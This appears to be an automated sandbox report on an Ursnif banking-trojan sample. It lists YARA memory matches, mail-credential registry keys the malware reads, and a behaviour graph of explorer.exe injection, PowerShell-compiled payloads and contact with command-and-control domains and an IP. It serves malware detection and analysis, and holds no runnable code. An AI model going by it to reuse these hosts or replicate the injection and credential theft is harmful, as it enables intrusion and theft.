Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4B1C6F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_6E4B1C6F

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
Tries to steal Mail credentials (via file access)
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Windows\explorer.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
Source: Yara match File source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 498359 Sample: data.dll Startdate: 07/10/2021 Architecture: WINDOWS Score: 100 123 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->123 125 Multi AV Scanner detection for domain / URL 2->125 127 Found malware configuration 2->127 129 13 other signatures 2->129 9 mshta.exe 19 2->9         started        12 loaddll32.exe 1 1 2->12         started        15 mshta.exe 19 2->15         started        process3 dnsIp4 159 Suspicious powershell command line found 9->159 17 powershell.exe 9->17         started        99 art.microsoftsofymicrosoftsoft.at 194.147.86.221, 49776, 49777, 49778 NETRACK-ASRU Russian Federation 12->99 101 init.icecreambob.com 12->101 161 Writes to foreign memory regions 12->161 163 Writes or reads registry keys via WMI 12->163 165 Writes registry values via WMI 12->165 21 cmd.exe 1 12->21         started        23 rundll32.exe 12->23         started        25 control.exe 12->25         started        29 2 other processes 12->29 27 powershell.exe 15->27         started        signatures5 process6 file7 81 C:\Users\user\AppData\...\a52acufz.cmdline, UTF-8 17->81 dropped 131 Injects code into the Windows Explorer (explorer.exe) 17->131 133 Writes to foreign memory regions 17->133 135 Modifies the context of a thread in another process (thread injection) 17->135 137 Compiles code for process injection (via .Net compiler) 17->137 31 explorer.exe 17->31 injected 35 csc.exe 17->35         started        38 csc.exe 17->38         started        40 conhost.exe 17->40         started        42 rundll32.exe 21->42         started        139 System process connects to network (likely due to code injection or exploit) 23->139 141 Writes registry values via WMI 23->141 44 rundll32.exe 25->44         started        83 C:\Users\user\AppData\Local\...\keehvxm3.0.cs, UTF-8 27->83 dropped 143 Maps a DLL or memory area into another process 27->143 145 Creates a thread in another existing process (thread injection) 27->145 46 csc.exe 27->46         started        48 csc.exe 27->48         started        50 conhost.exe 27->50         started        signatures8 process9 dnsIp10 103 art.microsoftsofymicrosoftsoft.at 31->103 107 System process connects to network (likely due to code injection or exploit) 31->107 109 Tries to steal Mail credentials (via file access) 31->109 111 Changes memory attributes in foreign processes to executable or writable 31->111 121 3 other signatures 31->121 52 cmd.exe 31->52         started        55 cmd.exe 31->55         started        57 RuntimeBroker.exe 31->57 injected 69 3 other processes 31->69 85 C:\Users\user\AppData\Local\...\a52acufz.dll, PE32 35->85 dropped 59 cvtres.exe 35->59         started        87 C:\Users\user\AppData\Local\...\ddwuzigh.dll, PE32 38->87 dropped 61 cvtres.exe 38->61         started        105 init.icecreambob.com 42->105 113 Writes to foreign memory regions 42->113 115 Allocates memory in foreign processes 42->115 117 Modifies the context of a thread in another process (thread injection) 42->117 63 control.exe 42->63         started        89 C:\Users\user\AppData\Local\...\aixojixg.dll, PE32 46->89 dropped 65 cvtres.exe 46->65         started        91 C:\Users\user\AppData\Local\...\keehvxm3.dll, PE32 48->91 dropped 67 cvtres.exe 48->67         started        file11 119 May check the online IP address of the machine 103->119 signatures12 process13 signatures14 147 Uses nslookup.exe to query domains 52->147 71 nslookup.exe 